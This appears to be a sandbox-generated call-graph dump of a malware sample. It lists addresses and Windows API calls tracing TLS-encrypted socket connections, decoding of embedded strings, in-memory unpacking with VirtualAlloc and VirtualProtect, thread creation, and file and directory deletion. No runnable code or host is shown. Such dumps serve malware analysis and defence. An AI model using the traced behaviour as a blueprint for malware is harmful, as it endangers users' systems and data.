CryptStringToBinaryA CryptStringToBinaryA 6706 404065 6453->6706 6454->6440 6454->6441 6454->6444 6454->6445 6454->6446 6454->6447 6454->6448 6454->6449 6454->6450 6454->6451 6454->6452 6454->6453 6456 4025e9 inet_addr 6454->6456 6457 4047b4 7 API calls 6454->6457 6460 401804 CryptStringToBinaryA CryptStringToBinaryA 6454->6460 6461 401858 CryptDecodeObject 6454->6461 6462 402097 wsprintfA 6454->6462 6454->6463 6465 40215d select 6454->6465 6466 4045b9 6 API calls 6454->6466 6467 406ee2 GetPEB 6454->6467 6468 4048e1 VirtualFree 6454->6468 6469 406df2 GetPEB 6454->6469 6470 4037b8 GetPEB 6454->6470 6471 4064d6 GetPEB 6454->6471 6472 403892 GetPEB 6454->6472 6473 403913 GetPEB 6454->6473 6714 403e30 6454->6714 6719 4039aa 6454->6719 6737 402fb6 6454->6737 6458 404484 8 API calls 6456->6458 6457->6454 6458->6454 6460->6454 6461->6454 6464 403892 GetPEB 6462->6464 6463->6413 6464->6454 6465->6454 6466->6454 6467->6454 6468->6454 6469->6454 6470->6454 6471->6454 6472->6454 6473->6454 6759 4066d2 6475->6759 6477 402781 socket 6760 40664b 6477->6760 6479 40279d setsockopt 6480 4027cd 6479->6480 6481 4027dd 6480->6481 6761 406558 6480->6761 6482 4027f9 inet_addr 6481->6482 6485 402807 6482->6485 6486 4028a9 6482->6486 6487 40281a htons ioctlsocket connect 6485->6487 6486->6336 6767 406698 6487->6767 6490 402881 ioctlsocket 6490->6486 6492 406178 6491->6492 6493 406df2 GetPEB 6492->6493 6494 406193 6493->6494 6495 406ee2 GetPEB 6494->6495 6496 40500c 6495->6496 6497 4061af 6496->6497 6498 406df2 GetPEB 6497->6498 6499 4061c2 6498->6499 6500 406ee2 GetPEB 6499->6500 6501 405015 GetVolumeInformationA 6500->6501 6501->6363 6503 4063a0 6502->6503 6504 40638d 6502->6504 6506 40419a 11 API calls 6503->6506 6505 4062fa 4 API calls 6504->6505 6507 40639e 6505->6507 6506->6507 6507->6386 6509 406b9e 6508->6509 6510 406bde VirtualAlloc 6509->6510 6511 406c00 6510->6511 6511->6386 6513 406cd1 6512->6513 6514 405401 CreateThread 6513->6514 6515 406df2 GetPEB 6513->6515 6516 406ee2 GetPEB 6513->6516 6514->6386 6515->6513 6516->6513 6518 406ee2 GetPEB 6517->6518 6519 406b45 6518->6519 6520 406b49 CreateThread 6519->6520 6521 406b5c 6519->6521 6520->6521 6521->6386 6525 406d45 6522->6525 6523 406d5d 6523->6386 6524 406dc3 VirtualProtect CreateThread 6524->6523 6525->6523 6525->6524 6527 406ab4 CreateFileA 6526->6527 6528 406ae2 6527->6528 6529 406ad7 6527->6529 6530 406b13 6528->6530 6531 406ae8 SetFilePointer WriteFile CloseHandle 6528->6531 6529->6527 6529->6528 6530->6386 6531->6530 6533 406310 WaitForSingleObject 6532->6533 6535 40631a 6532->6535 6533->6535 6534 406369 6536 406377 6534->6536 6537 40636f SetEvent 6534->6537 6535->6534 6538 406331 select 6535->6538 6536->6386 6537->6536 6538->6534 6539 406347 send 6538->6539 6539->6534 6539->6535 6543 406522 6540->6543 6541 405784 6545 4064d6 6541->6545 6542 406df2 GetPEB 6542->6543 6543->6541 6543->6542 6544 406ee2 GetPEB 6543->6544 6544->6543 6548 4064e1 6545->6548 6546 405791 6546->6341 6546->6344 6547 406df2 GetPEB 6547->6548 6548->6546 6548->6547 6549 406ee2 GetPEB 6548->6549 6549->6548 6551 406482 6550->6551 6552 406488 DeleteSecurityContext 6550->6552 6551->6552 6553 40648e 6551->6553 6552->6553 6554 40649c FreeCredentialsHandle 6553->6554 6556 4064a2 6553->6556 6554->6556 6555 4057c6 CloseHandle 6555->6359 6556->6555 6769 4064b7 shutdown closesocket 6556->6769 6559 402d6e 6558->6559 6560 4048e1 VirtualFree 6559->6560 6561 402d76 InitSecurityInterfaceA 6560->6561 6562 402d8a 6561->6562 6563 401168 64 API calls 6562->6563 6564 402db5 6563->6564 6565 402ed1 6564->6565 6566 402dbd WSAIoctl wsprintfA 6564->6566 6567 406517 GetPEB 6565->6567 6589 40419a 6566->6589 6569 402ede 6567->6569 6570 4064d6 GetPEB 6569->6570 6571 402eeb 6570->6571 6573 402f0b 6571->6573 6574 406df2 GetPEB 6571->6574 6572 402e55 select 6572->6565 6584 402e43 6572->6584 6575 406474 4 API calls 6573->6575 6576 402f00 6574->6576 6578 402f1d 6575->6578 6579 406ee2 GetPEB 6576->6579 6580 4048e1 VirtualFree 6578->6580 6579->6573 6583 402f26 6580->6583 6581 402f89 6581->6390 6583->6581 6586 402f50 VirtualAlloc 6583->6586 6584->6565 6584->6572 6585 4048e1 VirtualFree 6584->6585 6598 4042c8 6584->6598 6610 404842 6584->6610 6585->6584 6586->6581 6587 402f6e 6586->6587 6588 4048e1 VirtualFree 6587->6588 6588->6581 6590 4041b6 6589->6590 6591 4041bc WaitForSingleObject 6590->6591 6595 4041c6 6590->6595 6591->6595 6592 4042b3 6593 4042c1 6592->6593 6594 4042b9 SetEvent 6592->6594 6593->6584 6594->6593 6595->6592 6613 403892 6595->6613 6622 404484 6595->6622 6599 4042e1 6598->6599 6600 4048e1 VirtualFree 6599->6600 6603 4042e9 6599->6603 6600->6603 6601 4042fb select 6601->6603 6603->6601 6604 404451 6603->6604 6605 404842 2 API calls 6603->6605 6606 4048e1 VirtualFree 6603->6606 6608 404367 6603->6608 6654 4045b9 6603->6654 6604->6584 6605->6603 6606->6603 6608->6604 6609 406381 11 API calls 6608->6609 6667 403913 6608->6667 6609->6608 6611 404878 2 API calls 6610->6611 6612 40485a 6611->6612 6612->6584 6629 40332e 6613->6629 6615 4038e3 6618 4037b8 GetPEB 6615->6618 6616 4038b7 6616->6615 6649 4037b8 6616->6649 6619 4038f6 6618->6619 6620 4037b8 GetPEB 6619->6620 6621 40390c 6620->6621 6621->6595 6627 40449d 6622->6627 6623 4044a2 QueryContextAttributesA VirtualAlloc 6624 4045b2 6623->6624 6623->6627 6624->6595 6625 40453c EncryptMessage 6626 4062fa 4 API calls 6625->6626 6626->6627 6627->6623 6627->6624 6627->6625 6628 4048e1 VirtualFree 6627->6628 6628->6627 6630 40333d 6629->6630 6633 403363 6629->6633 6631 406df2 GetPEB 6630->6631 6632 403358 6631->6632 6634 406ee2 GetPEB 6632->6634 6635 40339c 6633->6635 6636 406df2 GetPEB 6633->6636 6634->6633 6638 406df2 GetPEB 6635->6638 6648 4033c6 6635->6648 6637 403391 6636->6637 6641 406ee2 GetPEB 6637->6641 6643 4033bb 6638->6643 6639 403403 6642 403418 6639->6642 6645 406517 GetPEB 6639->6645 6640 406df2 GetPEB 6644 4033f8 6640->6644 6641->6635 6642->6616 6646 406ee2 GetPEB 6643->6646 6647 406ee2 GetPEB 6644->6647 6645->6642 6646->6648 6647->6639 6648->6639 6648->6640 6653 4037d1 6649->6653 6650 40388b 6650->6615 6651 406df2 GetPEB 6651->6653 6652 406ee2 GetPEB 6652->6653 6653->6650 6653->6651 6653->6652 6655 4045d2 6654->6655 6656 4045dc VirtualAlloc 6655->6656 6661 4045ff 6656->6661 6664 404702 6656->6664 6657 4048e1 VirtualFree 6665 404790 6657->6665 6659 4048e1 VirtualFree 6662 4047aa 6659->6662 6663 40467d DecryptMessage 6661->6663 6661->6664 6661->6665 6666 404842 2 API calls 6661->6666 6676 404878 VirtualAlloc 6661->6676 6680 4063cd 6661->6680 6662->6603 6663->6661 6664->6657 6665->6659 6666->6661 6668 4037b8 GetPEB 6667->6668 6669 40392f 6668->6669 6670 4037b8 GetPEB 6669->6670 6671 403945 6670->6671 6672 4037b8 GetPEB 6671->6672 6673 403962 6671->6673 6672->6673 6674 40332e GetPEB 6673->6674 6675 403994 6674->6675 6675->6608 6677 404898 6676->6677 6678 4048e1 VirtualFree 6677->6678 6679 4048ab 6678->6679 6679->6661 6681 4063e9 6680->6681 6682 4063f4 select 6681->6682 6683 406419 6682->6683 6684 406409 recv 6682->6684 6683->6661 6684->6683 6685->6397 6687 402a61 6686->6687 6688 4048e1 VirtualFree 6687->6688 6689 402a69 6688->6689 6690 402765 11 API calls 6689->6690 6691 402a7a 6690->6691 6692 402b81 6691->6692 6693 402a82 wsprintfA 6691->6693 6755 4064b7 shutdown closesocket 6692->6755 6694 4062fa 4 API calls 6693->6694 6698 402aae 6694->6698 6696 402b89 6696->6428 6697 4063cd 2 API calls 6697->6698 6698->6692 6698->6697 6699 402aee ioctlsocket 6698->6699 6702 402b0b 6699->6702 6700 404878 2 API calls 6700->6702 6701 4063cd 2 API calls 6701->6702 6702->6692 6702->6699 6702->6700 6702->6701 6704 4048e1 VirtualFree 6703->6704 6705 4048c4 VirtualAlloc 6704->6705 6705->6454 6707 404081 6706->6707 6708 402a45 23 API calls 6707->6708 6712 4040be 6708->6712 6709 404181 6710 4048e1 VirtualFree 6709->6710 6711 40418d 6710->6711 6711->6454 6712->6709 6713 404143 CryptStringToBinaryA CryptStringToBinaryA 6712->6713 6713->6709 6756 4066d2 6714->6756 6716 403e4c CryptImportKey CryptExportKey 6757 406605 6716->6757 6718 403e96 CryptDestroyKey 6718->6454 6720 4039c6 6719->6720 6721 403e30 3 API calls 6720->6721 6722 4039d8 6721->6722 6723 403a29 6722->6723 6724 40332e GetPEB 6722->6724 6736 403b48 6722->6736 6725 40332e GetPEB 6723->6725 6723->6736 6724->6722 6726 403a59 6725->6726 6727 40332e GetPEB 6726->6727 6728 403a75 6727->6728 6729 406df2 GetPEB 6728->6729 6730 403ad5 6729->6730 6731 406ee2 GetPEB 6730->6731 6732 403ae0 6731->6732 6733 406df2 GetPEB 6732->6733 6734 403b3d 6733->6734 6735 406ee2 GetPEB 6734->6735 6735->6736 6736->6454 6738 402fd2 6737->6738 6739 402fe6 AcquireCredentialsHandleA 6738->6739 6740 403317 6739->6740 6741 403019 6739->6741 6740->6454 6742 402765 11 API calls 6741->6742 6743 40302a 6742->6743 6743->6740 6744 403040 InitializeSecurityContextA 6743->6744 6744->6740 6745 4030a2 6744->6745 6745->6740 6746 4062fa 4 API calls 6745->6746 6747 4030bc FreeContextBuffer VirtualAlloc 6746->6747 6747->6740 6751 4030df 6747->6751 6748 4063cd 2 API calls 6748->6751 6749 40327c 6750 4048e1 VirtualFree 6749->6750 6750->6740 6751->6748 6751->6749 6752 4031aa InitializeSecurityContextA 6751->6752 6753 4062fa 4 API calls 6751->6753 6752->6751 6754 403268 FreeContextBuffer 6753->6754 6754->6751 6755->6696 6756->6716 6758 406614 6757->6758 6758->6718 6758->6758 6759->6477 6760->6479 6762 406574 6761->6762 6763 40657f getaddrinfo 6762->6763 6764 4027f3 inet_ntoa 6763->6764 6765 4065a9 6763->6765 6764->6482 6765->6764 6766 4065ba freeaddrinfo 6765->6766 6766->6764 6768 402869 select 6767->6768 6768->6486 6768->6490 6769->6555 6786 4066d2 6770->6786 6772 405dd1 GetWindowThreadProcessId GetCurrentProcessId 6773 405f30 6772->6773 6774 405df1 GetClassNameA GetWindowTextA 6772->6774 6774->6773 6775 405e21 6774->6775 6775->6773 6776 405e6c 6775->6776 6777 405e86 SendMessageA OpenProcess 6776->6777 6777->6773 6778 405ec2 GetModuleFileNameExA 6777->6778 6778->6773 6779 405ee5 Sleep DeleteFileA 6778->6779 6779->6773 6780 405eff 6779->6780 6780->6773 6781 405f1b RemoveDirectoryA 6780->6781 6781->6773 6783 40601d 6782->6783 6784 406043 7 API calls 6783->6784 6785 4060fb GetMessageA TranslateMessage DispatchMessageA 6784->6785 6785->6785 6786->6772 7122 40c982 GetLocaleInfoA 7123 40c9b0 ___ansicp 7122->7123 7124 6746a3 7127 674539 7124->7127 7125 67454b select 7125->7127 7126 674809 2 API calls 7126->7127 7127->7125 7127->7126 7128 6746a1 7127->7128 7130 6745b7 7127->7130 7130->7128 7131 6765d1 6 API calls 7130->7131 7132 673b63 7130->7132 7131->7130 7133 673a08 GetPEB 7132->7133 7134 673b7f 7133->7134 7135 673a08 GetPEB 7134->7135 7136 673b95 7135->7136 7137 673bb2 7136->7137 7138 673a08 GetPEB 7136->7138 7139 67357e GetPEB 7137->7139 7138->7137 7140 673be4 7139->7140 7140->7130 6794 670920 TerminateProcess 7141 412b06 LocalAlloc 6882 40c9cb 6883 40ca0b __alloca_probe_16 6882->6883 6884 40ca95 6882->6884 6883->6884 6885 40cae9 WideCharToMultiByte 6883->6885 6885->6884 6817 67092b GetPEB 6818 670972 6817->6818 6886 674c6a 6889 674c86 6886->6889 6887 674e16 ioctlsocket 6888 674e3c 6887->6888 6893 674e11 6887->6893 6890 674e52 connect 6888->6890 6891 674e42 connect 6888->6891 6889->6887 6889->6893 6892 674e60 6890->6892 6891->6892 6894 674e75 select 6892->6894 6903 6765d1 6893->6903 6894->6893 6896 674e90 ioctlsocket WSAIoctl 6894->6896 6896->6893 6897 674fcb 6899 6765d1 6 API calls 6897->6899 6898 674f93 select 6901 674f49 6898->6901 6900 675076 6899->6900 6901->6897 6901->6898 6902 6765d1 6 API calls 6901->6902 6902->6901 6904 6765f0 6903->6904 6905 6765dd 6903->6905 6915 6743ea 6904->6915 6909 67654a 6905->6909 6908 6765ee 6908->6901 6910 676560 6909->6910 6911 6765b9 6910->6911 6914 676581 select 6910->6914 6912 6765c7 6911->6912 6913 6765bf SetEvent 6911->6913 6912->6908 6913->6912 6914->6910 6914->6911 6916 674406 6915->6916 6917 67440c WaitForSingleObject 6916->6917 6921 674416 6916->6921 6917->6921 6918 674503 6919 674511 6918->6919 6920 674509 SetEvent 6918->6920 6919->6908 6920->6919 6921->6918 6924 673ae2 6921->6924 6933 6746d4 6921->6933 6938 67357e 6924->6938 6926 673b33 6929 673a08 GetPEB 6926->6929 6927 673b07 6927->6926 6958 673a08 6927->6958 6930 673b46 6929->6930 6931 673a08 GetPEB 6930->6931 6932 673b5c 6931->6932 6932->6921 6936 6746ed 6933->6936 6934 674802 6934->6921 6935 674700 VirtualAlloc 6935->6934 6935->6936 6936->6934 6936->6935 6937 67654a 2 API calls 6936->6937 6937->6936 6939 6735b3 6938->6939 6940 67358d 6938->6940 6944 677042 GetPEB 6939->6944 6955 6735ec 6939->6955 6963 677042 6940->6963 6942 6735a8 6967 677132 6942->6967 6946 6735e1 6944->6946 6945 677042 GetPEB 6949 67360b 6945->6949 6951 677132 GetPEB 6946->6951 6947 673653 6948 673668 6947->6948 6973 676767 6947->6973 6948->6927 6953 677132 GetPEB 6949->6953 6950 677042 GetPEB 6954 673648 6950->6954 6951->6955 6957 673616 6953->6957 6956 677132 GetPEB 6954->6956 6955->6945 6955->6957 6956->6947 6957->6947 6957->6950 6959 673a21 6958->6959 6960 673adb 6959->6960 6961 677042 GetPEB 6959->6961 6962 677132 GetPEB 6959->6962 6960->6926 6961->6959 6962->6959 6964 67705e 6963->6964 6965 67706f GetPEB 6964->6965 6966 677084 6965->6966 6966->6942 6969 67714e 6967->6969 6968 677224 6968->6939 6969->6968 6970 677042 GetPEB 6969->6970 6971 67721d 6970->6971 6972 677132 GetPEB 6971->6972 6972->6968 6976 676772 6973->6976 6974 6767a1 6974->6948 6975 677042 GetPEB 6975->6976 6976->6974 6976->6975 6977 677132 GetPEB 6976->6977 6977->6976 6978 676d6a Sleep 6979 676d7d 6978->6979 6980 672df7 6981 672e13 6980->6981 6992 673206 6981->6992 6983 672e38 6984 672e40 wsprintfA 6983->6984 6990 672ee6 6983->6990 6985 6746d4 3 API calls 6984->6985 6987 672e75 6985->6987 6986 672e87 select 6986->6987 6986->6990 6987->6986 6987->6990 7003 674809 6987->7003 6989 672f44 6990->6989 6991 672f26 VirtualAlloc 6990->6991 6991->6989 6993 673222 6992->6993 7000 6734cc 6993->7000 7009 6729b5 6993->7009 6995 67327a 6996 67654a 2 API calls 6995->6996 6995->7000 6997 67330c 6996->6997 6998 673314 VirtualAlloc 6997->6998 6998->7000 7001 67332f 6998->7001 7000->6983 7001->7000 7002 67654a 2 API calls 7001->7002 7018 67661d 7001->7018 7002->7001 7004 674822 7003->7004 7005 67482c VirtualAlloc 7004->7005 7007 67484f 7005->7007 7008 674952 7005->7008 7006 67661d select 7006->7007 7007->7006 7007->7008 7008->6987 7013 6729d1 7009->7013 7010 672a49 inet_addr 7011 672a57 7010->7011 7012 672af9 7010->7012 7014 672a6a htons ioctlsocket connect 7011->7014 7012->6995 7013->7010 7022 6768e8 7014->7022 7017 672ad1 ioctlsocket 7017->7012 7019 676639 7018->7019 7020 676644 select 7019->7020 7021 676659 7020->7021 7021->7001 7023 672ab9 select 7022->7023 7023->7012 7023->7017 7024 404453 7027 4042e9 7024->7027 7025 4042fb select 7025->7027 7026 4045b9 6 API calls 7026->7027 7027->7025 7027->7026 7028 404451 7027->7028 7029 404842 2 API calls 7027->7029 7030 4048e1 VirtualFree 7027->7030 7032 404367 7027->7032 7029->7027 7030->7027 7031 403913 GetPEB 7031->7032 7032->7028 7032->7031 7033 406381 11 API calls 7032->7033 7033->7032 7034 676372 7035 67637e 7034->7035 7036 676391 7034->7036 7037 677235 ExitProcess 7036->7037 7142 671fbd 7187 67164d 7142->7187 7143 676767 GetPEB 7144 6728c9 7143->7144 7217 676726 7144->7217 7147 672913 7149 677042 GetPEB 7147->7149 7148 67292d 7150 677042 GetPEB 7148->7150 7151 672922 7149->7151 7152 67293e 7150->7152 7153 677132 GetPEB 7151->7153 7154 677132 GetPEB 7152->7154 7153->7148 7155 672949 7154->7155 7156 677042 GetPEB 7155->7156 7157 67295a 7156->7157 7158 677132 GetPEB 7157->7158 7163 672965 7158->7163 7159 673206 10 API calls 7159->7187 7160 671741 CryptStringToBinaryA 7192 674b06 7160->7192 7162 671774 CryptStringToBinaryA 7162->7187 7164 674b06 VirtualAlloc 7164->7187 7165 6739c9 VirtualAlloc select SetEvent 7165->7187 7166 67273a select 7166->7187 7167 674809 VirtualAlloc select 7167->7187 7168 6718fa inet_addr 7168->7187 7169 67191d CryptStringToBinaryA CryptStringToBinaryA 7195 6742b5 7169->7195 7170 6720bf CryptStringToBinaryA CryptStringToBinaryA 7170->7187 7172 673672 19 API calls 7172->7187 7173 673ae2 GetPEB 7173->7187 7174 672839 inet_addr 7175 6746d4 3 API calls 7174->7175 7175->7187 7176 671a54 CryptStringToBinaryA CryptStringToBinaryA 7176->7187 7177 6722e7 wsprintfA 7179 673ae2 GetPEB 7177->7179 7178 671aa8 CryptDecodeObject 7178->7187 7179->7187 7180 671f51 7180->7143 7181 677042 GetPEB 7181->7187 7182 6723ad select 7182->7187 7183 67357e GetPEB 7183->7187 7184 676726 GetPEB 7184->7187 7185 677132 GetPEB 7185->7187 7186 673a08 GetPEB 7186->7187 7187->7159 7187->7160 7187->7162 7187->7164 7187->7165 7187->7166 7187->7167 7187->7168 7187->7169 7187->7170 7187->7172 7187->7173 7187->7174 7187->7176 7187->7177 7187->7178 7187->7180 7187->7181 7187->7182 7187->7183 7187->7184 7187->7185 7187->7186 7188 6746d4 VirtualAlloc select SetEvent 7187->7188 7189 674a04 VirtualAlloc select select 7187->7189 7190 673b63 GetPEB 7187->7190 7201 673bfa 7187->7201 7188->7187 7189->7187 7190->7187 7222 674b31 7192->7222 7194 674b14 VirtualAlloc 7194->7187 7196 6742d1 7195->7196 7224 672c95 7196->7224 7198 6743d1 7198->7187 7199 67430e 7199->7198 7200 6743b3 CryptStringToBinaryA 7199->7200 7200->7198 7203 673c16 7201->7203 7202 673d98 7202->7187 7203->7202 7204 67357e GetPEB 7203->7204 7205 673c79 7203->7205 7204->7203 7205->7202 7206 67357e GetPEB 7205->7206 7207 673ca9 7206->7207 7208 67357e GetPEB 7207->7208 7209 673cc5 7208->7209 7210 677042 GetPEB 7209->7210 7211 673d25 7210->7211 7212 677132 GetPEB 7211->7212 7213 673d30 7212->7213 7214 677042 GetPEB 7213->7214 7215 673d8d 7214->7215 7216 677132 GetPEB 7215->7216 7216->7202 7220 676731 7217->7220 7218 672900 CryptReleaseContext 7218->7147 7218->7148 7219 677042 GetPEB 7219->7220 7220->7218 7220->7219 7221 677132 GetPEB 7220->7221 7221->7220 7223 674b3f 7222->7223 7223->7194 7225 672cb1 7224->7225 7226 6729b5 6 API calls 7225->7226 7227 672cca 7226->7227 7228 67654a 2 API calls 7227->7228 7229 672dd1 7227->7229 7231 672cfe 7228->7231 7229->7199 7230 67661d select 7230->7231 7231->7229 7231->7230 7232 672d3e ioctlsocket 7231->7232 7234 672d5b 7232->7234 7233 67661d select 7233->7234 7234->7229 7234->7232 7234->7233 6795 67003c 6796 670049 6795->6796 6810 670df8 SetErrorMode SetErrorMode 6796->6810 6800 670238 VirtualAlloc 6801 670265 6800->6801 6802 6702ce VirtualProtect 6801->6802 6804 67030b 6802->6804 6803 670439 VirtualFree 6808 6705f4 LoadLibraryA 6803->6808 6809 6704be 6803->6809 6804->6803 6805 6704e3 LoadLibraryA 6805->6809 6807 6708c7 6808->6807 6809->6805 6809->6808 6811 670223 6810->6811 6812 670d90 6811->6812 6813 670dad 6812->6813 6814 670db6 6813->6814 6815 670dbb GetPEB 6813->6815 6814->6800 6816 670ddc 6815->6816 6816->6800 6819 41311e 6822 412e19 6819->6822 6821 413123 6828 412e2c lstrlenW 6822->6828 6824 412e74 LoadLibraryA 6827 412e8a 6824->6827 6825 412e63 6825->6824 6826 412e92 GetListBoxInfo 6826->6827 6827->6826 6829 412ea5 GetProfileStringA 6827->6829 6830 412ec5 6827->6830 6828->6824 6828->6825 6829->6827 6831 412ee5 LocalAlloc 6830->6831 6832 412ef6 6830->6832 6831->6830 6833 412f16 TerminateThread 6832->6833 6837 412f27 6832->6837 6833->6832 6834 412f47 GetTickCount 6836 412f59 GetSystemTime GetLocalTime GetCommandLineA GetPrivateProfileStructW 6834->6836 6834->6837 6835 412f3c GetConsoleCursorInfo 6835->6834 6836->6837 6837->6834 6837->6835 6838 412fa1 6837->6838 6861 412b08 LocalAlloc 6838->6861 6840 412fa6 6841 412fb0 lstrcpyW 6840->6841 6842 412fcf 6840->6842 6841->6840 6843 412fef CreateSemaphoreA 6842->6843 6844 413005 6842->6844 6843->6842 6845 413049 6844->6845 6846 413025 6844->6846 6847 41301b GetPrivateProfileIntA 6844->6847 6849 41305b AddAtomW SetThreadContext 6845->6849 6850 41306d 6845->6850 6846->6844 6846->6845 6851 413036 FindResourceExA 6846->6851 6863 412b66 6846->6863 6847->6846 6849->6845 6853 413094 MoveFileW ContinueDebugEvent DebugBreak 6850->6853 6854 4130b4 6850->6854 6862 412b1c VirtualProtect 6850->6862 6851->6846 6853->6850 6866 412d7b 6854->6866 6856 4130c7 GetConsoleScreenBufferInfo GetConsoleMode SetCurrentDirectoryW 6857 4130b9 6856->6857 6857->6856 6858 4130f4 6857->6858 6859 413105 GetBinaryTypeW 6858->6859 6860 413113 6858->6860 6859->6858 6860->6821 6861->6840 6862->6850 6864 412b72 9 API calls 6863->6864 6865 412bca 6863->6865 6864->6865 6865->6846 6867 412d9a _lopen 6866->6867 6871 412da2 6866->6871 6867->6871 6868 412e14 6868->6857 6869 412dbc BuildCommDCBAndTimeoutsA 6869->6871 6870 412de3 GetPriorityClass 6870->6871 6871->6868 6871->6869 6871->6870 6872 412df6 SetConsoleMode SizeofResource 6871->6872 6874 412be0 6871->6874 6872->6871 6875 412c27 6874->6875 6876 412c38 WaitForSingleObject SleepEx 6875->6876 6877 412c78 SetSystemTimeAdjustment 6875->6877 6878 412c8f PostQueuedCompletionStatus CreateMutexW 6875->6878 6879 412ce1 GetTapeParameters GetTapeStatus SetTapeParameters WriteTapemark DeleteVolumeMountPointA 6875->6879 6881 412d6c 6875->6881 6876->6875 6877->6875 6880 412cc0 SetDefaultCommConfigW 6878->6880 6879->6875 6880->6875 6881->6871 6787 406122 6788 406141 6787->6788 6789 40612e DefWindowProcA 6787->6789 6791 405b81 3 API calls 6788->6791 6790 406155 6789->6790 6793 406fe5 ExitProcess 6790->6793 6792 40614b WSACleanup 6791->6792 6792->6793 7235 670005 7240 67092b GetPEB 7235->7240 7237 670030 7242 67003c 7237->7242 7241 670972 7240->7241 7241->7237 7243 670049 7242->7243 7244 670df8 2 API calls 7243->7244 7245 670223 7244->7245 7246 670d90 GetPEB 7245->7246 7247 670238 VirtualAlloc 7246->7247 7248 670265 7247->7248 7249 6702ce VirtualProtect 7248->7249 7251 67030b 7249->7251 7250 670439 VirtualFree 7255 6705f4 LoadLibraryA 7250->7255 7256 6704be 7250->7256 7251->7250 7252 6704e3 LoadLibraryA 7252->7256 7254 6708c7 7255->7254 7256->7252 7256->7255 7257 676005 7258 676021 7257->7258 7259 676135 Sleep 7258->7259 7260 67614b 7258->7260 7259->7260 7261 670001 7262 670005 7261->7262 7263 67092b GetPEB 7262->7263 7264 670030 7263->7264 7265 67003c 8 API calls 7264->7265 7266 670038 7265->7266 7267 402ba7 7268 402bc3 7267->7268 7269 4048e1 VirtualFree 7268->7269 7270 402bcb 7269->7270 7271 402fb6 24 API calls 7270->7271 7272 402be8 7271->7272 7273 402bf0 wsprintfA 7272->7273 7274 402c96 7272->7274 7276 404484 8 API calls 7273->7276 7275 406474 4 API calls 7274->7275 7281 402cac 7275->7281 7277 402c25 7276->7277 7277->7274 7279 402c37 select 7277->7279 7282 4045b9 6 API calls 7277->7282 7286 404842 2 API calls 7277->7286 7288 4048e1 VirtualFree 7277->7288 7278 402d1e 7280 4048e1 VirtualFree 7278->7280 7279->7274 7279->7277 7283 402d0f 7280->7283 7281->7278 7284 402cd6 VirtualAlloc 7281->7284 7282->7277 7284->7278 7285 402cf4 7284->7285 7287 4048e1 VirtualFree 7285->7287 7286->7277 7287->7283 7288->7277 7038 674fcd 7043 674f79 7038->7043 7039 674f93 select 7039->7043 7040 674fcb 7041 6765d1 6 API calls 7040->7041 7042 675076 7041->7042 7043->7039 7043->7040 7044 6765d1 6 API calls 7043->7044 7044->7043 7045 401d6d 7102 4013fd 7045->7102 7046 406517 GetPEB 7047 402679 7046->7047 7048 4064d6 GetPEB 7047->7048 7049 4026b0 CryptReleaseContext 7048->7049 7050 4026c3 7049->7050 7051 4026dd 7049->7051 7053 406df2 GetPEB 7050->7053 7052 406df2 GetPEB 7051->7052 7054 4026ee 7052->7054 7055 4026d2 7053->7055 7056 406ee2 GetPEB 7054->7056 7057 406ee2 GetPEB 7055->7057 7058 4026f9 7056->7058 7057->7051 7059 406df2 GetPEB 7058->7059 7060 40270a 7059->7060 7061 406ee2 GetPEB 7060->7061 7066 402715 7061->7066 7062 4014f1 CryptStringToBinaryA 7064 4048b6 2 API calls 7062->7064 7063 402fb6 24 API calls 7063->7102 7064->7102 7065 406474 4 API calls 7065->7102 7067 4048e1 VirtualFree 7066->7067 7069 402734 7067->7069 7068 401524 CryptStringToBinaryA 7068->7102 7071 4048e1 VirtualFree 7069->7071 7070 4048b6 VirtualAlloc VirtualFree 7070->7102 7072 402740 7071->7072 7073 4048e1 VirtualFree 7072->7073 7074 40274c 7073->7074 7075 4048e1 VirtualFree 7074->7075 7076 402758 7075->7076 7077 403779 8 API calls 7077->7102 7078 4024ea select 7078->7102 7079 4016aa inet_addr 7079->7102 7080 401e6f CryptStringToBinaryA CryptStringToBinaryA 7080->7102 7081 4016cd CryptStringToBinaryA CryptStringToBinaryA 7083 404065 25 API calls 7081->7083 7082 403422 39 API calls 7082->7102 7083->7102 7084 4047b4 7 API calls 7084->7102 7085 4025e9 inet_addr 7086 404484 8 API calls 7085->7086 7086->7102 7087 403e30 3 API calls 7087->7102 7088 401804 CryptStringToBinaryA CryptStringToBinaryA 7088->7102 7089 401d01 7089->7046 7090 401858 CryptDecodeObject 7090->7102 7091 402097 wsprintfA 7092 403892 GetPEB 7091->7092 7092->7102 7093 406df2 GetPEB 7093->7102 7094 40215d select 7094->7102 7095 4045b9 6 API calls 7095->7102 7096 40332e GetPEB 7096->7102 7097 4048e1 VirtualFree 7097->7102 7098 4064d6 GetPEB 7098->7102 7099 406ee2 GetPEB 7099->7102 7100 4037b8 GetPEB 7100->7102 7101 403892 GetPEB 7101->7102 7102->7062 7102->7063 7102->7065 7102->7068 7102->7070 7102->7077 7102->7078 7102->7079 7102->7080 7102->7081 7102->7082 7102->7084 7102->7085 7102->7087 7102->7088 7102->7089 7102->7090 7102->7091 7102->7093 7102->7094 7102->7095 7102->7096 7102->7097 7102->7098 7102->7099 7102->7100 7102->7101 7103 404484 8 API calls 7102->7103 7104 403913 GetPEB 7102->7104 7105 4039aa 4 API calls 7102->7105 7103->7102 7104->7102 7105->7102 7106 676254 7107 67626d 7106->7107 7108 67634b GetMessageA TranslateMessage DispatchMessageA 7107->7108 7108->7108 7289 671311 7290 67131f 7289->7290 7291 6713a9 Sleep 7289->7291 7301 674b5e 7290->7301 7292 677235 ExitProcess 7291->7292 7302 674b92 7301->7302 7303 674b77 Sleep 7302->7303 7305 674b96 7302->7305 7303->7302 7306 674c54 Sleep 7305->7306 7307 675095 7305->7307 7306->7305 7308 6750b1 7307->7308 7309 6750ca VirtualAlloc 7308->7309 7310 6750e8 VirtualAlloc 7308->7310 7311 6750e5 7309->7311 7343 6753a4 7309->7343 7312 675103 7310->7312 7310->7343 7311->7310 7316 6751d7 7312->7316 7322 675125 7312->7322 7313 676767 GetPEB 7314 6759d4 7313->7314 7315 676726 GetPEB 7314->7315 7317 6759e1 7315->7317 7318 6729b5 6 API calls 7316->7318 7321 677042 GetPEB 7317->7321 7326 675a01 7317->7326 7319 6751cd 7318->7319 7320 6751f3 WSAIoctl 7319->7320 7319->7343 7323 675257 7320->7323 7325 6759f6 7321->7325 7324 675193 7322->7324 7333 67516f 7322->7333 7361 672b06 7322->7361 7433 6763ac 7323->7433 7365 6713b8 7324->7365 7327 677132 GetPEB 7325->7327 7326->7326 7331 675a3e CloseHandle 7326->7331 7327->7326 7337 675a52 7331->7337 7336 67517b 